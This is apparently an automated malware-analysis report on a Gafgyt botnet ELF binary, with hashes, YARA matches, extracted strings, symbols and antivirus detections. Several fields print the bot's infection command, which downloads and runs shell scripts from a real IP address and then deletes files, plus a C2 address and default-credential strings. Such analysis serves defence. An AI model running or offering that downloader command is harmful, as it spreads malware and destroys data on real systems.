Binary
ABI ELFOSABI_SYSV
Size 73.81KB
Type ET_EXEC
trid 50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type ELF
Wordsize 32
Architecture x86
Hashes
md5 08c3bf87ff0a26ac3e65f10ff1516655
sha1 6c6f425b13c6af72870d55c56574f00421d4e3fa
crc32 0x391a74f7
sha224 fdd8ee63366209b306a2414b070bf995c6ed84777139559cd682efa5
sha256 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284 c8f
sha384 bee304b66f5f99cc1b164a88ad86c467c3929b2b9d6efc625efae4459e620e e16f3098bba81560b80ab9f10bacfa1022
sha512 2c3bed47ea246e930bbf8a6b45b4e47d3586ae2a77d16640e6fc288695714 b8a02fe55937d501960fe852b85b7025ea019b993c36ec0613d01eab8f447 b26a6d
ssdeep 1536:xyq93lguLYiPvoVjRWSbXJ0rWlC/kPstVkYFWw23fQW83LZ5:p3KwYiPvoV jRWSbLQ/kPstVkjw2IN
Community
Report #768
Creation Date: Oct. 19, 2019, 5:05 p.m.
Last Update: Oct. 19, 2019, 5:05 p.m.
File:
0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f Results:
Google False
HashLib False
YARA
Matches maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf
Suspicious True
Dwarf
List
Number 0
Files
Sys Home
Proc /proc/cpuinfo, /proc/net/route
Password
Suspicious True
Flags
Flags 0
Packer
List None
Packed False
Network
IPs cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.165.7 6/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 104.238.165.76 -c get tftp1.s h; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.238.165.76; chmo d 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104
.238.165.76 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.s h; rm -rf *; exit, 104.238.165.76:23
URLs cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.165.7 6/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 104.238.165.76 -c get tftp1.s h; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.238.165.76; chmo d 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104 .238.165.76 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.s h; rm -rf *; exit
Mails
Suspicious True
Strings
List
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.165.76/bins.sh; chmod 777 bins.sh; sh bins.s h; tftp 104.238.165.76 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.238.165.76; chmod 7 77 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.238.165.76 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
104.238.165.76:23 .got.plt
Network is down
Machine is not on the network No route to host
Host is down
been_there_done_that.3001 been_there_done_that _fwrite.c
open.c write.c
Transport endpoint is not connected No such process
Block device required Remote address changed No such device or address Operation now in progress Is a named type file Connection reset by peer Too many links
Too many open files Link has been severed Object is remote
Too many open files in system No such device
REPORT %s:%s:%s
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown Operation not permitted
My IP: %s Invalid flag "%s"
8.8.8.8 BUILD %s BUILD %s
Too many users __GI_execl
__GI_fflush_unlocked PONG!
__libc_nanosleep __GI_sleep __socketcall __GI_execve
__register_frame_info_bases __GI_pipe
_Jv_RegisterClasses
__deregister_frame_info_bases fflush_unlocked.c
__GI_nanosleep nanosleep.c __socketcall.c fflush_unlocked socket.c __GI_socket sleep.c sendHTTP tcpcsum PONG HTTP
commServer pipe.c
Software caused connection abort Socket operation on non-socket inet_addr
currentServer Identifier removed
Interrupted system call should be restarted Operation already in progress
Address family not supported by protocol Too many references: cannot splice makeIPPacket
usernames
Transport endpoint is already connected KILLATTK
random_poly_info random.c
random_r changeme
Permission denied nanosleep
srandom_r __GI_random_r password sendTCP
Too many levels of symbolic links Can not access a needed shared library fwrite_unlocked
Not a XENIX named type file processCmd
random_r.c Exec format error __GI_srandom_r
Protocol driver not attached passwords
Attempting to link in too many shared libraries getHost
Network dropped connection on reset __GI_random
vfprintf
Name not unique on network
Symbols
List libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __E H_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtor s_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END_
_, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysd eps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, client.c, c, Q, i.4252, pr intchar, prints, printi, print, fdopen_pids, hextable, ipState, libc/sysdeps/linu x/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, getdtablesize.c, getpid.c, getrlimit.c, ioctl.c, kill.c, open.c, pi pe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, writ e.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_locati on.c, printf.c, popen.c, mylock, popen_list, _stdio.c, _stdio_streams, __stdio_
mutex_initializer.4160, _fixed_buffers, _wcommit.c, vfprintf.c, _vfprintf_inter nal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type _codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, sp ec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, fputs_unlocked .c, fwrite_unlocked.c, memcpy.c, memset.c, strcat.c, strchr.c, strcpy.c, strlen .c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unkno wn.1330, _string_syserrmsgs.c, strtok.c, next_start.1278, isatty.c, tcgetattr.
c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, connect.c, getsockname.
c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c , sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, m ylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c , strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c , __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_d one_that.3001, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sys deps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getre s.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, munm ap.c, nanosleep.c, sbrk.c, wait4.c, errno.c, wcrtomb.c, wcsrtombs.c, wcsnrt ombs.c, fclose.c, fdopen.c, _WRITE.c, _fopen.c, _fwrite.c, _trans2w.c, _load_i nttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, fflush_unlocked.c, memchr.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, i net_aton.c, raise.c, dl-support.c, brk.c, fseeko.c, fseeko64.c, _adjust_pos.c, _cs_funcs.c, rawmemchr.c, strspn.c, llseek.c, __fini_array_end, __fini_array_s tart, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init _array_start, __preinit_array_start, __GI_execve, __libc_sigaction, strcpy, __G I_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_mem chr, __GI___glibc_strerror_r, waitpid, getrlimit, ioctl, _stdio_openlist_use_cou nt, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, _ _GI_time, getgid, popen, sysconf, printf, stdout, random, __GI_getpagesize, getdtablesize, __GI_h_errno, __GI___ctype_toupper, recv, connect, __GI___uC libc_fini, numpids, sigemptyset, __pthread_mutex_lock, initConnection, __si gdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, __GI_setsid, sen dTCP, pclose, __bsd_signal, __GI_strpbrk, munmap, __GI_setsockopt, __libc_s tack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fc ntl, atol, _h_errno, getRandomPublicIP, __ctype_b, __GI_random_r, usernam
es, errno, getegid, __GI_sbrk, zprintf, __GI___uClibc_init, execve, getpagesiz e, getpid, __GI_lseek64, setstate_r, getHost, __libc_getpid, wildString, __xpg _strerror_r, fcntl64, prctl, memcpy, makeRandomStr, getRandomIP, __GI_fp uts_unlocked, execl, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __lib c_select, _ppfs_init, __GI___C_ctype_toupper, __libc_nanosleep, trim, dup2, _ _pthread_mutex_init, getuid, system, malloc, isatty, sleep, __GI_atol, __GI_r ead, random_r, __dso_handle, clock_getres, tcpcsum, fdpclose, socket, __GI _dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fc ntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_write, __ctype_tou pper, __libc_read, _string_syserrmsgs, __GI_open, __GI_strchr, sigaddset, __
GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI _inet_ntoa, send, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, _ _GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, st rtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_sta te, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pt hread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_f ini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, write, environ, __GI_c lose, getBuild, kill, fputs_unlocked, __pthread_mutex_trylock, strcat, __GI_br k, __GI_strcat, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmas k, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_cou nt, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, setstat e, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, s tdin, __GI_isatty, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, ini t_rand, rand, signal, read, getCores, __GI_memcpy, wcsrtombs, _stdio_user_
locking, strncpy, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_c type_b, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __GI _getrlimit, __GI_strcpy, strtok, __stdio_adjust_position, malloc_trim, fdopen, _vfprintf_internal, fork, gotIP, __GI_sleep, sigaction, _dl_phdr, __GI___libc_fcn tl64, __uClibc_init, __GI_munmap, _store_inttype, __getpagesize, __GI_rando m, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_l ock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, __libc_close, __GI_getpid, ine t_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, _ _bss_start, __libc_open, getOurIP, memset, __GI_socket, main, __glibc_strerr or_r, listFork, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_s igaction, ntohs, sendUDP, inet_ntoa, tcgetattr, time, __libc_system, __GI_ab ort, fdpopen, __stdio_init_mutex, __GI__exit, data_start, __GI_sysconf, __h_er rno_location, matchPrompt, __C_ctype_b_data, _stdio_fopen, _fini, __GI_chdi r, __vfork, __GI_mmap, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __
libc_waitpid, __GI_waitpid, _stdio_term, __GI_vfprintf, __GI_signal, stderr, co mmServer, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __GI_s igemptyset, __GI_printf, __libc_fork, __atexit_lock, scanPid, rand_cmwc, __lib c_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, fw rite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdt ablesize, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, initstate_r, __GI_connect, __curbrk, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strt o_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, brk, __C _ctype_toupper_data, _dl_aux_init, sendJUNK, _errno, atoi, _stdio_openlist_d el_lock, __GI_inet_aton, _exit, szprintf, strspn, __libc_recv, __libc_creat, strle n, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parses pec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdi o_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, setsid, __GI_inet_addr, __GI_strnlen, _Jv_RegisterClasses, infectline, macAdd ress, __GI___errno_location, readUntil, fcntl, __GI_fdopen, __GI_atoi, fseeko6 4, wcrtomb, __GI_getsockname, close, __libc_connect, passwords, __GI_strle n, sendHOLD, mainCommSock, pids, sendCNC, vfprintf, strpbrk, getBogos, _load_inttype, raise, free, sigprocmask, getsockname
Number 624
Reason None
Suspicious False
Version
Version EV_CURRENT
Foremost
Matches None
Suspicious False
Sections
List , .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, . comment, .shstrtab, .symtab, .strtab
Number 16
Suspicious False
Segments
Number 3
Suspicious False
Compilers
List GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2,
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2
Identified 133
Suspicious True
Functions
List , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crts tuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIS T__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , fr ame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END __, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i3 86/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , client.c, , c, , Q, , i.4252, , printc har, , prints, , printi, , print, , fdopen_pids, , hextable, , ipState, , libc/sysdep s/linux/i386/vfork.S, , __syscall_fcntl.c, , __syscall_fcntl64.c, , _exit.c, , chdir.
c, , close.c, , dup2.c, , fork.c, , getdtablesize.c, , getpid.c, , getrlimit.c, , ioctl .c, , kill.c, , open.c, , pipe.c, , prctl.c, , read.c, , select.c, , setsid.c, , sigproc mask.c, , time.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.
c, , __C_ctype_toupper.c, , __errno_location.c, , printf.c, , popen.c, , mylock, , popen_list, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.4160, , _fix ed_buffers, , _wcommit.c, , vfprintf.c, , _vfprintf_internal.c, , _charpad, , _fp_
out_narrow, , spec_base.4370, , prefix.4371, , _ppfs_init.c, , _ppfs_prepargs.
c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , t ype_sizes, , spec_flags.4372, , qual_chars.4377, , spec_chars.4373, , spec_r anges.4374, , spec_or_mask.4375, , spec_and_mask.4376, , fputs_unlocked .c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strcat.c, , strchr.c, , strcpy.
c, , strlen.c, , strncpy.c, , strnlen.c, , strstr.c, , __glibc_strerror_r.c, , __xpg_str error_r.c, , unknown.1330, , _string_syserrmsgs.c, , strtok.c, , next_start.127 8, , isatty.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2827, , inet_makeaddr.
c, , connect.c, , getsockname.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , socket.c, , sigaddset.c, , sigempty.c, , signal.c, , sigsetops.c , , malloc.c, , __malloc_largebin_index, , free.c, , __malloc_trim, , abort.c, , m ylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state , , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _ stdlib_strto_l.c, , exit.c, , execl.c, , sleep.c, , sysconf.c, , __uClibc_main.c, , __
pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_d one_that.3001, , sigaction.c, , __restore_rt, , __restore, , __syscall_error.c, , li bc/sysdeps/linux/i386/mmap.S, , __socketcall.c, , __syscall_rt_sigaction.c, , c lock_getres.c, , execve.c, , getegid.c, , geteuid.c, , getgid.c, , getpagesize.c, , getuid.c, , munmap.c, , nanosleep.c, , sbrk.c, , wait4.c, , errno.c, , wcrtom b.c, , wcsrtombs.c, , wcsnrtombs.c, , fclose.c, , fdopen.c, , _WRITE.c, , _fope
n.c, , _fwrite.c, , _trans2w.c, , _load_inttype.c, , _store_inttype.c, , _uintmaxt ostr.c, , _fpmaxtostr.c, , fmt, , exp10_table, , fflush_unlocked.c, , memchr.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , raise.c, , dl -support.c, , brk.c, , fseeko.c, , fseeko64.c, , _adjust_pos.c, , _cs_funcs.c, , ra wmemchr.c, , strspn.c, , llseek.c, , __fini_array_end, , __fini_array_start, , __i nit_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_arr ay_start, , __preinit_array_start, , __GI_execve, , __libc_sigaction, , strcpy, , _ _GI_fcntl64, , recvLine, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , __
GI_memchr, , __GI___glibc_strerror_r, , waitpid, , getrlimit, , ioctl, , _stdio_op enlist_use_count, , __GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI___C_ct ype_toupper_data, , __GI_time, , getgid, , popen, , sysconf, , printf, , stdout, , random, , __GI_getpagesize, , getdtablesize, , __GI_h_errno, , __GI___ctype _toupper, , recv, , connect, , __GI___uClibc_fini, , numpids, , sigemptyset, , _ _pthread_mutex_lock, , initConnection, , __sigdelset, , __GI_clock_getres, , _ _uClibc_fini, , memrchr, , geteuid, , __GI_setsid, , sendTCP, , pclose, , __bsd_
signal, , __GI_strpbrk, , munmap, , __GI_setsockopt, , __libc_stack_end, , __G I_fclose, , __GI_wcsnrtombs, , __GI_pipe, , _uintmaxtostr, , __libc_fcntl, , atol, , _h_errno, , getRandomPublicIP, , __ctype_b, , __GI_random_r, , usernames, , errno, , getegid, , __GI_sbrk, , zprintf, , __GI___uClibc_init, , execve, , getpa gesize, , getpid, , __GI_lseek64, , setstate_r, , getHost, , __libc_getpid, , wild String, , __xpg_strerror_r, , fcntl64, , prctl, , memcpy, , makeRandomStr, , g etRandomIP, , __GI_fputs_unlocked, , execl, , sendHTTP, , creat, , _stdio_ope nlist_dec_use, , sclose, , __libc_select, , _ppfs_init, , __GI___C_ctype_toupper, , __libc_nanosleep, , trim, , dup2, , __pthread_mutex_init, , getuid, , system, , malloc, , isatty, , sleep, , __GI_atol, , __GI_read, , random_r, , __dso_handle, , clock_getres, , tcpcsum, , fdpclose, , socket, , __GI_dup2, , select, , _pthrea d_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , __GI_memset, , isspace, , __stdio_seek, , mempcpy, , __GI_write, , __ctype_toupper, , __libc_
read, , _string_syserrmsgs, , __GI_open, , __GI_strchr, , sigaddset, , __GI_tcg etattr, , __environ, , mmap, , wcsnrtombs, , makeIPPacket, , sockprintf, , __G I_inet_ntoa, , send, , abort, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlo cked, , __GI_getgid, , srandom_r, , _init, , __GI_inet_ntoa_r, , __GI_setstate_r, , parseHex, , strtol, , pipe, , __libc_lseek64, , strnlen, , rawmemchr, , __GI_m empcpy, , __malloc_state, , __GI___C_ctype_b_data, , __sigaddset, , nanosle ep, , __GI_send, , h_errno, , __pthread_mutex_unlock, , wait4, , __register_fr ame_info_bases, , __GI_exit, , __app_fini, , csum, , __exit_cleanup, , __GI_exe cl, , __GI_srandom_r, , write, , environ, , __GI_close, , getBuild, , kill, , fputs_
unlocked, , __pthread_mutex_trylock, , strcat, , __GI_brk, , __GI_strcat, , __GI _nanosleep, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_fseek, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , c onnectTimeout, , __raise, , setsockopt, , bsd_signal, , fseek, , __GI_kill, , sets tate, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , __stdin, , stdin, , __GI_isatty, , _start, , __deregister_frame_info_bases, , strst r, , __GI_ioctl, , init_rand, , rand, , signal, , read, , getCores, , __GI_memcpy, , wcsrtombs, , _stdio_user_locking, , strncpy, , htonl, , sendto, , __C_ctype_t oupper, , StartTheLelz, , __GI___C_ctype_b, , __GI_strncpy, , __libc_send, , __
GI___xpg_strerror_r, , currentServer, , __GI_getrlimit, , __GI_strcpy, , strtok, , __stdio_adjust_position, , malloc_trim, , fdopen, , _vfprintf_internal, , fork, , gotIP, , __GI_sleep, , sigaction, , _dl_phdr, , __GI___libc_fcntl64, , __uClibc_ini t, , __GI_munmap, , _store_inttype, , __getpagesize, , __GI_random, , __sysc all_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , __libc_close, , __GI_getpid, , inet_aton, , index, , _pthread_cleanup_push_defer, , processCmd, , __sigism ember, , __bss_start, , __libc_open, , getOurIP, , memset, , __GI_socket, , ma in, , __glibc_strerror_r, , listFork, , __stdio_fwrite, , negotiate, , srand, , initsta te, , fclose, , __syscall_rt_sigaction, , ntohs, , sendUDP, , inet_ntoa, , tcgetat tr, , time, , __libc_system, , __GI_abort, , fdpopen, , __stdio_init_mutex, , __G I__exit, , data_start, , __GI_sysconf, , __h_errno_location, , matchPrompt, , __
C_ctype_b_data, , _stdio_fopen, , _fini, , __GI_chdir, , __vfork, , __GI_mmap, ,
fdgets, , __get_pc_thunk_bx, , strerror_r, , __GI_select, , __libc_waitpid, , __GI _waitpid, , _stdio_term, , __GI_vfprintf, , __GI_signal, , stderr, , commServer, , vfork, , __C_ctype_b, , srandom, , _ppfs_setargs, , __GI_sendto, , __GI_sige mptyset, , __GI_printf, , __libc_fork, , __atexit_lock, , scanPid, , rand_cmwc, , __libc_fcntl64, , getsockopt, , __GI_fseeko64, , fflush_unlocked, , __stdio_wco mmit, , fwrite_unlocked, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lo ck, , __GI_getdtablesize, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_u nlocked, , __GI_strstr, , _end, , htons, , _sigintr, , _ppfs_prepargs, , __GI_strs pn, , initstate_r, , __GI_connect, , __curbrk, , _dl_phnum, , _fpmaxtostr, , __er rno_location, , uppercase, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio _WRITE, , _stdio_init, , __GI_geteuid, , brk, , __C_ctype_toupper_data, , _dl_a ux_init, , sendJUNK, , _errno, , atoi, , _stdio_openlist_del_lock, , __GI_inet_ato n, , _exit, , szprintf, , strspn, , __libc_recv, , __libc_creat, , strlen, , lseek64, , open, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , _ _GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , __libc_sendto, , __stdi o_trans2w_o, , __GI_vfork, , strchr, , __GI_rawmemchr, , __GI_raise, , __data_
start, , setsid, , __GI_inet_addr, , __GI_strnlen, , _Jv_RegisterClasses, , infectli ne, , macAddress, , __GI___errno_location, , readUntil, , fcntl, , __GI_fdopen, , __GI_atoi, , fseeko64, , wcrtomb, , __GI_getsockname, , close, , __libc_conn ect, , passwords, , __GI_strlen, , sendHOLD, , mainCommSock, , pids, , send CNC, , vfprintf, , strpbrk, , getBogos, , _load_inttype, , raise, , free, , sigproc mask, , getsockname,
Present True
Anti-Debug
Ptrace False
Anti-disasm False
Entry Point
Address 0x8048168
Suspicious False
Embedded ELF
List None
Identified 0
Program Header
Size 32
Number 3
Offset 52
Section Header
Size 40
Number 16
Offset 57640
AVclass
gafgyt 1
VirusTotal
md5 08c3bf87ff0a26ac3e65f10ff1516655
sha1 6c6f425b13c6af72870d55c56574f00421d4e3fa
SCANS (DETECTION RATE = 62.71%)
AVG result: ELF:DDoS-Y [Trj]
update: 20170807 version: 8.0.1489.320 detected: True
CMC update: 20170805
version: 1.1.0.977 detected: False
MAX result: malware (ai score=80)
update: 20170807 version: 2017.6.26.1 detected: True
Bkav update: 20170807
version: 1.3.0.9282 detected: False
K7GW update: 20170807
version: 10.20.24212 detected: False
ALYac result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807
version: 1.1.1.2 detected: True
Avast result: ELF:DDoS-Y [Trj]
update: 20170807 version: 8.0.1489.320 detected: True
Avira result: DDOS/LNX.Lightaidra.ljbci
update: 20170807 version: 8.3.3.4 detected: True
Baidu update: 20170807
version: 1.0.0.2 detected: False
Cyren result: ELF/Backdoor.UFDH-
update: 20170807 version: 5.4.30.7 detected: True
DrWeb result: Linux.BackDoor.Fgt.373
update: 20170807 version: 7.0.28.2020 detected: True
